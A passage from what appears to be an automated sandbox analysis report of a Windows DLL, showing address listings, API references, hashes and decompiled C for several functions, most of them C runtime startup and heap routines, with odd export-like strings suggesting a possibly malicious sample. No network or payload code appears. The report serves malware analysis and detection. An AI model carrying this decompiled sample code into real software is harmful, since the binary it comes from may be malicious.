                                                                                                                                    0x10001a35
                                                                                                                                    0x10001a45
                                                                                                                                    0x10001a59
                                                                                                                                    0x10001a5f
                                                                                                                                    0x10001a64
                                                                                                                                    0x10001a6a
                                                                                                                                    0x10001a70
                                                                                                                                    0x10001a74
                                                                                                                                    0x10001a83
                                                                                                                                    0x10001a87
                                                                                                                                    0x10001a93
                                                                                                                                    0x10001a98
                                                                                                                                    0x10001a9c
                                                                                                                                    0x10001ac4
                                                                                                                                    0x10001ae4
                                                                                                                                    0x10001aef
                                                                                                                                    0x10001b11
                                                                                                                                    0x10001b11
                                                                                                                                    0x10001b1e
                                                                                                                                    0x10001b25
                                                                                                                                    0x10001b27
                                                                                                                                    0x10001b27
                                                                                                                                    0x10001b31
                                                                                                                                    0x10001b37
                                                                                                                                    0x10001b39
                                                                                                                                    0x10001b39
                                                                                                                                    0x10001b40
                                                                                                                                    0x10001b47
                                                                                                                                    0x10001b4e
                                                                                                                                    0x10001b50
                                                                                                                                    0x10001b57
                                                                                                                                    0x10001b60
                                                                                                                                    0x10001b75
                                                                                                                                    0x10001b78
                                                                                                                                    0x10001b7b
                                                                                                                                    0x10001b82
                                                                                                                                    0x10001b8c
                                                                                                                                    0x10001b8c
                                                                                                                                    0x10001b95
                                                                                                                                    0x10001ba6

                                                                                                                                    APIs
                                                                                                                                    • CertOpenSystemStoreA.CRYPT32(1000E108,?), ref: 10001A1A
                                                                                                                                    • EqualSid.ADVAPI32(1000E106,1000E106), ref: 10001A2A
                                                                                                                                    • FlushFileBuffers.KERNEL32(1000E106), ref: 10001A35
                                                                                                                                    • GetWindowThreadProcessId.USER32(1000E104,1000E106), ref: 10001A45
                                                                                                                                    • ReleaseSemaphore.KERNEL32(1000E2D4,1000E104,00000000), ref: 10001A59
                                                                                                                                    • LoadBitmapA.USER32 ref: 10001A9C
                                                                                                                                    • ScrollDC.USER32 ref: 10001AC4
                                                                                                                                    • SetScrollPos.USER32 ref: 10001AE4
                                                                                                                                    • HeapDestroy.KERNEL32(1000E108,?,1000E2D4), ref: 10001AEF
                                                                                                                                    • ReadFile.KERNEL32(1000E108,1000E2D4,?,1000E2D4,1000E2D4,?,1000E2D4), ref: 10001B11
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000001.00000002.687872325.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                    • Associated: 00000001.00000002.687869167.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000001.00000002.687877691.000000001000A000.00000002.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000001.00000002.687880940.000000001000C000.00000008.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000001.00000002.687883756.000000001000D000.00000004.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000001.00000002.687887976.0000000010010000.00000002.00020000.sdmp Download File
                                                                                                                                    Similarity
                                                                                                                                    • API ID: FileScroll$BitmapBuffersCertDestroyEqualFlushHeapLoadOpenProcessReadReleaseSemaphoreStoreSystemThreadWindow
                                                                                                                                    • String ID: EnableCapotasto32$RemoveHeadrace
                                                                                                                                    • API String ID: 4228436720-2533295656
                                                                                                                                    • Opcode ID: 9bed4bca3679bbabb76dec61235da76683930cca1fa985c0e6fe0bf4c56d325c
                                                                                                                                    • Instruction ID: aa9cf5a43dbb99cac99c69c5b064df1b281807df25892426c95c19d4ebe6aa60
                                                                                                                                    • Opcode Fuzzy Hash: 9bed4bca3679bbabb76dec61235da76683930cca1fa985c0e6fe0bf4c56d325c
                                                                                                                                    • Instruction Fuzzy Hash: 704148710082A1AEF300EF54CCD88EA7BF9FB8A3C1F404519F655A226CE3B59984CB13
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 10002ECD, Relevance: 7.6, APIs: 5, Instructions: 57COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 85%
                                                                                                                                    			E10002ECD(intOrPtr __eax, intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, char _a4) {
				intOrPtr _v0;
				void* _v804;
				intOrPtr _v808;
				intOrPtr _v812;
				intOrPtr _t6;
				intOrPtr _t11;
				intOrPtr _t12;
				intOrPtr _t13;
				long _t17;
				intOrPtr _t21;
				intOrPtr _t22;
				intOrPtr _t25;
				intOrPtr _t26;
				intOrPtr _t27;
				intOrPtr* _t31;
				void* _t34;

				_t27 = __esi;
				_t26 = __edi;
				_t25 = __edx;
				_t22 = __ecx;
				_t21 = __ebx;
				_t6 = __eax;
				_t34 = _t22 -  *0x1000e420; // 0x44ea7bf2
				if(_t34 == 0) {
					asm("repe ret");
				}
				 *0x1000f210 = _t6;
				 *0x1000f20c = _t22;
				 *0x1000f208 = _t25;
				 *0x1000f204 = _t21;
				 *0x1000f200 = _t27;
				 *0x1000f1fc = _t26;
				 *0x1000f228 = ss;
				 *0x1000f21c = cs;
				 *0x1000f1f8 = ds;
				 *0x1000f1f4 = es;
				 *0x1000f1f0 = fs;
				 *0x1000f1ec = gs;
				asm("pushfd");
				_pop( *0x1000f220);
				 *0x1000f214 =  *_t31;
				 *0x1000f218 = _v0;
				 *0x1000f224 =  &_a4;
				 *0x1000f160 = 0x10001;
				_t11 =  *0x1000f218; // 0x0
				 *0x1000f114 = _t11;
				 *0x1000f108 = 0xc0000409;
				 *0x1000f10c = 1;
				_t12 =  *0x1000e420; // 0x44ea7bf2
				_v812 = _t12;
				_t13 =  *0x1000e424; // 0xbb15840d
				_v808 = _t13;
				 *0x1000f158 = IsDebuggerPresent();
				_push(1);
				E1000492A(_t14);
				SetUnhandledExceptionFilter(0);
				_t17 = UnhandledExceptionFilter(0x1000a24c);
				if( *0x1000f158 == 0) {
					_push(1);
					E1000492A(_t17);
				}
				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
			}



















                                                                                                                                    0x10002ecd
                                                                                                                                    0x10002ecd
                                                                                                                                    0x10002ecd
                                                                                                                                    0x10002ecd
                                                                                                                                    0x10002ecd
                                                                                                                                    0x10002ecd
                                                                                                                                    0x10002ecd
                                                                                                                                    0x10002ed3
                                                                                                                                    0x10002ed5
                                                                                                                                    0x10002ed5
                                                                                                                                    0x100031d5
                                                                                                                                    0x100031da
                                                                                                                                    0x100031e0
                                                                                                                                    0x100031e6
                                                                                                                                    0x100031ec
                                                                                                                                    0x100031f2
                                                                                                                                    0x100031f8
                                                                                                                                    0x100031ff
                                                                                                                                    0x10003206
                                                                                                                                    0x1000320d
                                                                                                                                    0x10003214
                                                                                                                                    0x1000321b
                                                                                                                                    0x10003222
                                                                                                                                    0x10003223
                                                                                                                                    0x1000322c
                                                                                                                                    0x10003234
                                                                                                                                    0x1000323c
                                                                                                                                    0x10003247
                                                                                                                                    0x10003251
                                                                                                                                    0x10003256
                                                                                                                                    0x1000325b
                                                                                                                                    0x10003265
                                                                                                                                    0x1000326f
                                                                                                                                    0x10003274
                                                                                                                                    0x1000327a
                                                                                                                                    0x1000327f
                                                                                                                                    0x1000328b
                                                                                                                                    0x10003290
                                                                                                                                    0x10003292
                                                                                                                                    0x1000329a
                                                                                                                                    0x100032a5
                                                                                                                                    0x100032b2
                                                                                                                                    0x100032b4
                                                                                                                                    0x100032b6
                                                                                                                                    0x100032bb
                                                                                                                                    0x100032cf

                                                                                                                                    APIs
                                                                                                                                    • IsDebuggerPresent.KERNEL32 ref: 10003285
                                                                                                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 1000329A
                                                                                                                                    • UnhandledExceptionFilter.KERNEL32(1000A24C), ref: 100032A5
                                                                                                                                    • GetCurrentProcess.KERNEL32(C0000409), ref: 100032C1
                                                                                                                                    • TerminateProcess.KERNEL32(00000000), ref: 100032C8
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000001.00000002.687872325.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                    • Associated: 00000001.00000002.687869167.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000001.00000002.687877691.000000001000A000.00000002.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000001.00000002.687880940.000000001000C000.00000008.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000001.00000002.687883756.000000001000D000.00000004.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000001.00000002.687887976.0000000010010000.00000002.00020000.sdmp Download File
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2579439406-0
                                                                                                                                    • Opcode ID: 1a3639aa3dba0f344c431cb2b16e074ceffaa10fc190f9430ec11a68cc25475a
                                                                                                                                    • Instruction ID: 1b95a328b90afb3d0908e15443ddadbd3c70359556c32ac8b068be8f95e04966
                                                                                                                                    • Opcode Fuzzy Hash: 1a3639aa3dba0f344c431cb2b16e074ceffaa10fc190f9430ec11a68cc25475a
                                                                                                                                    • Instruction Fuzzy Hash: F721D2B9800225DFF700DF14D8C46A43BE4FB093D4F50411EE90893A69EBB45A84AF59
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 100039D0, Relevance: 40.4, APIs: 18, Strings: 5, Instructions: 109libraryloadermemoryCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 91%
                                                                                                                                    			E100039D0(void* __ebx, void* __edx) {
				void* __edi;
				void* __esi;
				_Unknown_base(*)()* _t7;
				long _t10;
				void* _t11;
				int _t12;
				void* _t18;
				intOrPtr _t21;
				long _t26;
				void* _t30;
				void* _t37;
				struct HINSTANCE__* _t38;
				void* _t41;
				void* _t43;

				_t37 = __edx;
				_t30 = __ebx;
				_t38 = GetModuleHandleA("KERNEL32.DLL");
				if(_t38 != 0) {
					 *0x1000f474 = GetProcAddress(_t38, "FlsAlloc");
					 *0x1000f478 = GetProcAddress(_t38, "FlsGetValue");
					 *0x1000f47c = GetProcAddress(_t38, "FlsSetValue");
					_t7 = GetProcAddress(_t38, "FlsFree");
					__eflags =  *0x1000f474;
					_t41 = TlsSetValue;
					 *0x1000f480 = _t7;
					if( *0x1000f474 == 0) {
						L6:
						 *0x1000f478 = TlsGetValue;
						 *0x1000f474 = E10003687;
						 *0x1000f47c = _t41;
						 *0x1000f480 = TlsFree;
					} else {
						__eflags =  *0x1000f478;
						if( *0x1000f478 == 0) {
							goto L6;
						} else {
							__eflags =  *0x1000f47c;
							if( *0x1000f47c == 0) {
								goto L6;
							} else {
								__eflags = _t7;
								if(_t7 == 0) {
									goto L6;
								}
							}
						}
					}
					_t10 = TlsAlloc();
					__eflags = _t10 - 0xffffffff;
					 *0x1000e430 = _t10;
					if(_t10 == 0xffffffff) {
						L15:
						_t11 = 0;
						__eflags = 0;
					} else {
						_t12 = TlsSetValue(_t10,  *0x1000f478);
						__eflags = _t12;
						if(_t12 == 0) {
							goto L15;
						} else {
							E1000356C();
							 *0x1000f474 = E100035B8( *0x1000f474);
							 *0x1000f478 = E100035B8( *0x1000f478);
							 *0x1000f47c = E100035B8( *0x1000f47c);
							 *0x1000f480 = E100035B8( *0x1000f480);
							_t18 = E10004B0B();
							__eflags = _t18;
							if(_t18 == 0) {
								L14:
								E100036BA();
								goto L15;
							} else {
								_push(E10003846);
								_t21 =  *((intOrPtr*)(E10003624( *0x1000f474)))();
								__eflags = _t21 - 0xffffffff;
								 *0x1000e42c = _t21;
								if(_t21 == 0xffffffff) {
									goto L14;
								} else {
									_t43 = E10003C22(1, 0x214);
									__eflags = _t43;
									if(_t43 == 0) {
										goto L14;
									} else {
										_push(_t43);
										_push( *0x1000e42c);
										__eflags =  *((intOrPtr*)(E10003624( *0x1000f47c)))();
										if(__eflags == 0) {
											goto L14;
										} else {
											_push(0);
											_push(_t43);
											E100036F7(_t30, _t37, _t38, _t43, __eflags);
											_t26 = GetCurrentThreadId();
											 *(_t43 + 4) =  *(_t43 + 4) | 0xffffffff;
											 *_t43 = _t26;
											_t11 = 1;
										}
									}
								}
							}
						}
					}
					return _t11;
				} else {
					E100036BA();
					return 0;
				}
			}

















                                                                                                                                    0x100039d0
                                                                                                                                    0x100039d0
                                                                                                                                    0x100039dc
                                                                                                                                    0x100039e0
                                                                                                                                    0x10003a00
                                                                                                                                    0x10003a0d
                                                                                                                                    0x10003a1a
                                                                                                                                    0x10003a1f
                                                                                                                                    0x10003a21
                                                                                                                                    0x10003a28
                                                                                                                                    0x10003a2e
                                                                                                                                    0x10003a33
                                                                                                                                    0x10003a4b
                                                                                                                                    0x10003a50
                                                                                                                                    0x10003a5a
                                                                                                                                    0x10003a64
                                                                                                                                    0x10003a6a
                                                                                                                                    0x10003a35
                                                                                                                                    0x10003a35
                                                                                                                                    0x10003a3c
                                                                                                                                    0x00000000
                                                                                                                                    0x10003a3e
                                                                                                                                    0x10003a3e
                                                                                                                                    0x10003a45
                                                                                                                                    0x00000000
                                                                                                                                    0x10003a47
                                                                                                                                    0x10003a47
                                                                                                                                    0x10003a49
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x10003a49
                                                                                                                                    0x10003a45
                                                                                                                                    0x10003a3c
                                                                                                                                    0x10003a6f
                                                                                                                                    0x10003a75
                                                                                                                                    0x10003a78
                                                                                                                                    0x10003a7d
                                                                                                                                    0x10003b4f
                                                                                                                                    0x10003b4f
                                                                                                                                    0x10003b4f
                                                                                                                                    0x10003a83
                                                                                                                                    0x10003a8a
                                                                                                                                    0x10003a8c
                                                                                                                                    0x10003a8e
                                                                                                                                    0x00000000
                                                                                                                                    0x10003a94
                                                                                                                                    0x10003a94
                                                                                                                                    0x10003aaa
                                                                                                                                    0x10003aba
                                                                                                                                    0x10003aca
                                                                                                                                    0x10003ad7
                                                                                                                                    0x10003adc
                                                                                                                                    0x10003ae1
                                                                                                                                    0x10003ae3
                                                                                                                                    0x10003b4a
                                                                                                                                    0x10003b4a
                                                                                                                                    0x00000000
                                                                                                                                    0x10003ae5
                                                                                                                                    0x10003ae5
                                                                                                                                    0x10003af6
                                                                                                                                    0x10003af8
                                                                                                                                    0x10003afb
                                                                                                                                    0x10003b00
                                                                                                                                    0x00000000
                                                                                                                                    0x10003b02
                                                                                                                                    0x10003b0e
                                                                                                                                    0x10003b10
                                                                                                                                    0x10003b14
                                                                                                                                    0x00000000
                                                                                                                                    0x10003b16
                                                                                                                                    0x10003b16
                                                                                                                                    0x10003b17
                                                                                                                                    0x10003b2b
                                                                                                                                    0x10003b2d
                                                                                                                                    0x00000000
                                                                                                                                    0x10003b2f
                                                                                                                                    0x10003b2f
                                                                                                                                    0x10003b31
                                                                                                                                    0x10003b32
                                                                                                                                    0x10003b39
                                                                                                                                    0x10003b3f
                                                                                                                                    0x10003b43
                                                                                                                                    0x10003b47
                                                                                                                                    0x10003b47
                                                                                                                                    0x10003b2d
                                                                                                                                    0x10003b14
                                                                                                                                    0x10003b00
                                                                                                                                    0x10003ae3
                                                                                                                                    0x10003a8e
                                                                                                                                    0x10003b53
                                                                                                                                    0x100039e2
                                                                                                                                    0x100039e2
                                                                                                                                    0x100039ea
                                                                                                                                    0x100039ea

                                                                                                                                    APIs
                                                                                                                                    • GetModuleHandleA.KERNEL32(KERNEL32.DLL,?,10002F9E,?,?,00000001,?,?,1000310E,00000001,?,?,1000B390,0000000C,100031C8,?), ref: 100039D6
                                                                                                                                    • __mtterm.LIBCMT ref: 100039E2
                                                                                                                                      • Part of subcall function 100036BA: __decode_pointer.LIBCMT ref: 100036CB
                                                                                                                                      • Part of subcall function 100036BA: TlsFree.KERNEL32(00000020,1000303A,?,?,00000001,?,?,1000310E,00000001,?,?,1000B390,0000000C,100031C8,?), ref: 100036E5
                                                                                                                                      • Part of subcall function 100036BA: DeleteCriticalSection.KERNEL32(00000000,00000000,?,00000001,1000303A,?,?,00000001,?,?,1000310E,00000001,?,?,1000B390,0000000C), ref: 10004B6F
                                                                                                                                      • Part of subcall function 100036BA: DeleteCriticalSection.KERNEL32(00000020,?,00000001,1000303A,?,?,00000001,?,?,1000310E,00000001,?,?,1000B390,0000000C,100031C8), ref: 10004B99
                                                                                                                                    • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 100039F8
                                                                                                                                    • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 10003A05
                                                                                                                                    • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 10003A12
                                                                                                                                    • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 10003A1F
                                                                                                                                    • TlsAlloc.KERNEL32(?,?,00000001,?,?,1000310E,00000001,?,?,1000B390,0000000C,100031C8,?), ref: 10003A6F
                                                                                                                                    • TlsSetValue.KERNEL32(00000000,?,?,00000001,?,?,1000310E,00000001,?,?,1000B390,0000000C,100031C8,?), ref: 10003A8A
                                                                                                                                    • __init_pointers.LIBCMT ref: 10003A94
                                                                                                                                    • __encode_pointer.LIBCMT ref: 10003A9F
                                                                                                                                    • __encode_pointer.LIBCMT ref: 10003AAF
                                                                                                                                    • __encode_pointer.LIBCMT ref: 10003ABF
                                                                                                                                    • __encode_pointer.LIBCMT ref: 10003ACF
                                                                                                                                    • __decode_pointer.LIBCMT ref: 10003AF0
                                                                                                                                    • __calloc_crt.LIBCMT ref: 10003B09
                                                                                                                                    • __decode_pointer.LIBCMT ref: 10003B23
                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 10003B39
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000001.00000002.687872325.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                    • Associated: 00000001.00000002.687869167.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000001.00000002.687877691.000000001000A000.00000002.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000001.00000002.687880940.000000001000C000.00000008.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000001.00000002.687883756.000000001000D000.00000004.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000001.00000002.687887976.0000000010010000.00000002.00020000.sdmp Download File
                                                                                                                                    Similarity
                                                                                                                                    • API ID: AddressProc__encode_pointer$__decode_pointer$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__mtterm
                                                                                                                                    • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
                                                                                                                                    • API String ID: 4287529916-3819984048
                                                                                                                                    • Opcode ID: b4d1ead4c33f6033c1096739a0aa6af20c33ea56c78c274fed75c4ecccc6c432
                                                                                                                                    • Instruction ID: 0bf447cf4964569eb9da356a023b523573ed09149bcc9166d4cd5bd92e3c38de
                                                                                                                                    • Opcode Fuzzy Hash: b4d1ead4c33f6033c1096739a0aa6af20c33ea56c78c274fed75c4ecccc6c432
                                                                                                                                    • Instruction Fuzzy Hash: A3318230804320AAF712EF798C85A2B7BADEB057D5F11862EE950D36BDDB359444EB50
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 100036F7, Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 46libraryloaderCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 86%
                                                                                                                                    			E100036F7(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				struct HINSTANCE__* _t20;
				intOrPtr _t24;
				intOrPtr _t28;
				intOrPtr _t40;
				void* _t41;

				_push(0xc);
				_push(0x1000b3d0);
				E100046A0(__ebx, __edi, __esi);
				_t20 = GetModuleHandleA("KERNEL32.DLL");
				 *(_t41 - 0x1c) = _t20;
				_t40 =  *((intOrPtr*)(_t41 + 8));
				 *((intOrPtr*)(_t40 + 0x5c)) = 0x1000e460;
				 *((intOrPtr*)(_t40 + 0x14)) = 1;
				if(_t20 != 0) {
					 *((intOrPtr*)(_t40 + 0x1f8)) = GetProcAddress(_t20, "EncodePointer");
					 *((intOrPtr*)(_t40 + 0x1fc)) = GetProcAddress( *(_t41 - 0x1c), "DecodePointer");
				}
				 *((intOrPtr*)(_t40 + 0x70)) = 1;
				 *((char*)(_t40 + 0xc8)) = 0x43;
				 *((char*)(_t40 + 0x14b)) = 0x43;
				 *(_t40 + 0x68) = 0x1000e950;
				InterlockedIncrement(0x1000e950);
				E10004C81(0xc);
				 *(_t41 - 4) =  *(_t41 - 4) & 0x00000000;
				_t24 =  *((intOrPtr*)(_t41 + 0xc));
				 *((intOrPtr*)(_t40 + 0x6c)) = _t24;
				if(_t24 == 0) {
					_t28 =  *0x1000e940; // 0x1000e868
					 *((intOrPtr*)(_t40 + 0x6c)) = _t28;
				}
				_push( *((intOrPtr*)(_t40 + 0x6c)));
				E10005511();
				 *(_t41 - 4) = 0xfffffffe;
				return E100046E5(E100037A2());
			}








                                                                                                                                    0x100036f7
                                                                                                                                    0x100036f9
                                                                                                                                    0x100036fe
                                                                                                                                    0x10003708
                                                                                                                                    0x1000370e
                                                                                                                                    0x10003711
                                                                                                                                    0x10003714
                                                                                                                                    0x1000371e
                                                                                                                                    0x10003723
                                                                                                                                    0x10003733
                                                                                                                                    0x10003743
                                                                                                                                    0x10003743
                                                                                                                                    0x10003749
                                                                                                                                    0x1000374c
                                                                                                                                    0x10003753
                                                                                                                                    0x1000375f
                                                                                                                                    0x10003763
                                                                                                                                    0x1000376b
                                                                                                                                    0x10003771
                                                                                                                                    0x10003775
                                                                                                                                    0x10003778
                                                                                                                                    0x1000377d
                                                                                                                                    0x1000377f
                                                                                                                                    0x10003784
                                                                                                                                    0x10003784
                                                                                                                                    0x10003787
                                                                                                                                    0x1000378a
                                                                                                                                    0x10003790
                                                                                                                                    0x100037a1

                                                                                                                                    APIs
                                                                                                                                    • GetModuleHandleA.KERNEL32(KERNEL32.DLL,1000B3D0,0000000C,10003809,00000000,00000000,?,10003BEF,?,00000001,00000001,10004C0B,00000018,1000B458,0000000C,10004C9A), ref: 10003708
                                                                                                                                    • GetProcAddress.KERNEL32(00000000,EncodePointer), ref: 10003731
                                                                                                                                    • GetProcAddress.KERNEL32(?,DecodePointer), ref: 10003741
                                                                                                                                    • InterlockedIncrement.KERNEL32(1000E950), ref: 10003763
                                                                                                                                    • __lock.LIBCMT ref: 1000376B
                                                                                                                                    • ___addlocaleref.LIBCMT ref: 1000378A
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000001.00000002.687872325.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                    • Associated: 00000001.00000002.687869167.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000001.00000002.687877691.000000001000A000.00000002.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000001.00000002.687880940.000000001000C000.00000008.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000001.00000002.687883756.000000001000D000.00000004.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000001.00000002.687887976.0000000010010000.00000002.00020000.sdmp Download File
                                                                                                                                    Similarity
                                                                                                                                    • API ID: AddressProc$HandleIncrementInterlockedModule___addlocaleref__lock
                                                                                                                                    • String ID: DecodePointer$EncodePointer$KERNEL32.DLL
                                                                                                                                    • API String ID: 1036688887-2843748187
                                                                                                                                    • Opcode ID: 194b97e662b43b9292dcb28e3f9b25c3a7ea647888a5cfc09fdcdf914ad7714c
                                                                                                                                    • Instruction ID: 7b342abf3cdd7806e7adc81edaa968fe5f4d1ac6d56fe1d247c81bcf0d7e25b8
                                                                                                                                    • Opcode Fuzzy Hash: 194b97e662b43b9292dcb28e3f9b25c3a7ea647888a5cfc09fdcdf914ad7714c
                                                                                                                                    • Instruction Fuzzy Hash: 6F11ACB4804B459FF760CF79CC84B9ABBE4EF05380F10491DE69A93258CB79A940CF15
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 10003B54, Relevance: 7.5, APIs: 5, Instructions: 44memoryCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 39%
                                                                                                                                    			E10003B54(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr* _t10;
				intOrPtr _t13;
				intOrPtr _t24;
				void* _t26;

				_push(0xc);
				_push(0x1000b418);
				_t8 = E100046A0(__ebx, __edi, __esi);
				_t24 =  *((intOrPtr*)(_t26 + 8));
				if(_t24 == 0) {
					L9:
					return E100046E5(_t8);
				}
				if( *0x1000fb80 != 3) {
					_push(_t24);
					L7:
					_t8 = HeapFree( *0x1000f594, 0, ??);
					_t32 = _t8;
					if(_t8 == 0) {
						_t10 = E10004E17(_t32);
						 *_t10 = E10004DDC(GetLastError());
					}
					goto L9;
				}
				E10004C81(4);
				 *(_t26 - 4) =  *(_t26 - 4) & 0x00000000;
				_t13 = E10005E30(_t24);
				 *((intOrPtr*)(_t26 - 0x1c)) = _t13;
				if(_t13 != 0) {
					_push(_t24);
					_push(_t13);
					E10005E5B();
				}
				 *(_t26 - 4) = 0xfffffffe;
				_t8 = E10003BAA();
				if( *((intOrPtr*)(_t26 - 0x1c)) != 0) {
					goto L9;
				} else {
					_push( *((intOrPtr*)(_t26 + 8)));
					goto L7;
				}
			}







                                                                                                                                    0x10003b54
                                                                                                                                    0x10003b56
                                                                                                                                    0x10003b5b
                                                                                                                                    0x10003b60
                                                                                                                                    0x10003b65
                                                                                                                                    0x10003bdc
                                                                                                                                    0x10003be1
                                                                                                                                    0x10003be1
                                                                                                                                    0x10003b6e
                                                                                                                                    0x10003bb3
                                                                                                                                    0x10003bb4
                                                                                                                                    0x10003bbc
                                                                                                                                    0x10003bc2
                                                                                                                                    0x10003bc4
                                                                                                                                    0x10003bc6
                                                                                                                                    0x10003bd9
                                                                                                                                    0x10003bdb
                                                                                                                                    0x00000000
                                                                                                                                    0x10003bc4
                                                                                                                                    0x10003b72
                                                                                                                                    0x10003b78
                                                                                                                                    0x10003b7d
                                                                                                                                    0x10003b83
                                                                                                                                    0x10003b88
                                                                                                                                    0x10003b8a
                                                                                                                                    0x10003b8b
                                                                                                                                    0x10003b8c
                                                                                                                                    0x10003b92
                                                                                                                                    0x10003b93
                                                                                                                                    0x10003b9a
                                                                                                                                    0x10003ba3
                                                                                                                                    0x00000000
                                                                                                                                    0x10003ba5
                                                                                                                                    0x10003ba5
                                                                                                                                    0x00000000
                                                                                                                                    0x10003ba5

                                                                                                                                    APIs
                                                                                                                                    • __lock.LIBCMT ref: 10003B72
                                                                                                                                      • Part of subcall function 10004C81: __mtinitlocknum.LIBCMT ref: 10004C95
                                                                                                                                      • Part of subcall function 10004C81: __amsg_exit.LIBCMT ref: 10004CA1
                                                                                                                                      • Part of subcall function 10004C81: EnterCriticalSection.KERNEL32(00000001,00000001,?,100038C9,0000000D,1000B3F0,00000008,100039BB,00000001,?,?,00000001,?,?,1000310E,00000001), ref: 10004CA9
                                                                                                                                    • ___sbh_find_block.LIBCMT ref: 10003B7D
                                                                                                                                    • ___sbh_free_block.LIBCMT ref: 10003B8C
                                                                                                                                    • HeapFree.KERNEL32(00000000,?,1000B418,0000000C,1000381F,00000000,?,10003BEF,?,00000001,00000001,10004C0B,00000018,1000B458,0000000C,10004C9A), ref: 10003BBC
                                                                                                                                    • GetLastError.KERNEL32(?,10003BEF,?,00000001,00000001,10004C0B,00000018,1000B458,0000000C,10004C9A,00000001,00000001,?,100038C9,0000000D,1000B3F0), ref: 10003BCD
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000001.00000002.687872325.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                    • Associated: 00000001.00000002.687869167.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000001.00000002.687877691.000000001000A000.00000002.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000001.00000002.687880940.000000001000C000.00000008.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000001.00000002.687883756.000000001000D000.00000004.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000001.00000002.687887976.0000000010010000.00000002.00020000.sdmp Download File
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2714421763-0
                                                                                                                                    • Opcode ID: 2417a78bfbb064c8311719e972041dc4a8698ddd427709be769db5ab411b3767
                                                                                                                                    • Instruction ID: 1778ba0b25afb32ff742fd4d41492875c5ce2f9c1eae74d3c831e85a62d79847
                                                                                                                                    • Opcode Fuzzy Hash: 2417a78bfbb064c8311719e972041dc4a8698ddd427709be769db5ab411b3767
                                                                                                                                    • Instruction Fuzzy Hash: CE01F279800312EAFB11DFB0DC0AB4F3BA8EF007E9F118118F604A608DEF349A41CA59
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 100058E5, Relevance: 6.0, APIs: 4, Instructions: 47COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 89%
                                                                                                                                    			E100058E5(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t15;
				LONG* _t21;
				long _t23;
				void* _t29;
				void* _t31;
				LONG* _t33;
				void* _t34;
				void* _t35;

				_t35 = __eflags;
				_t29 = __edx;
				_t25 = __ebx;
				_push(0xc);
				_push(0x1000b538);
				E100046A0(__ebx, __edi, __esi);
				_t31 = E1000382E(__edi, _t35);
				_t15 =  *0x1000ef74; // 0xfffffffe
